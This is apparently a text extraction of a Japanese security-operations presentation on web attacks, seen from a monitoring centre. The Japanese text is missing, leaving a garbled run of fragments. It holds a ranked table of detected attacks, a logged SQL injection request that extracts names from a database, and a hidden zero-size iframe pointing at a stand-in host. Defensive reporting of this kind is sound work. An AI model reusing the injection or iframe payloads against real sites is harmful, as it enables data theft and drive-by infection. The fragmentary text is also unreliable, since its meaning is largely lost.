n-miwa@lac.co.jp
(JSOC) OS Web
(JSOC) (JSOC) SQL SQL
Event Name Source IP Correlated Horizontal Scan Detected Microsoft ASN.1 Library Buffer Overflow Detected Vertical Scan Detected Internet Explorer Activity Detected SQL Slammer Worm Propagation Attempt Windows ntdll.dll Buffer Overflow Attack Detected Suspicious Traffic Containing UPX-Compressed Binary Detected SYN Flood Attack Detected Attempt to Proxy SMTP & FTP via HTTP Detected Count 3,148 1,978 1,540 537 293 273 215 196 165 164
Web IIS Windows
Web SQL SQL Windows IIS SQL Windows
Web SQL SQL SQL
Web
Web
Web
Web 2005-03-xx 07:39:26 x.x.x.x - 443 GET /example.asp cc=183%20and%20 (Select top 1 isnull(cast([firstname]), ) + char(124) + isnull(cast([lastname]))) 10 80040e07 varchar_ _ Yusuke Tahara _ _int_ 500 4953 Microsoft+URL+Control+-+6.00.8862 -
Web <iframe src=http://www.hoge.com/counter.ap? id=xxx width=0 height=0> </iframe>
Web
Web 2004 Web
Web 2004 Web
SQL SQL ; DBMS SQL Java PrepareStatement Perl prepare ASP SQL Web or
SQL
SQL
Web DB
SQL bot ( )
USB
RMT
IFRAME
IFRAME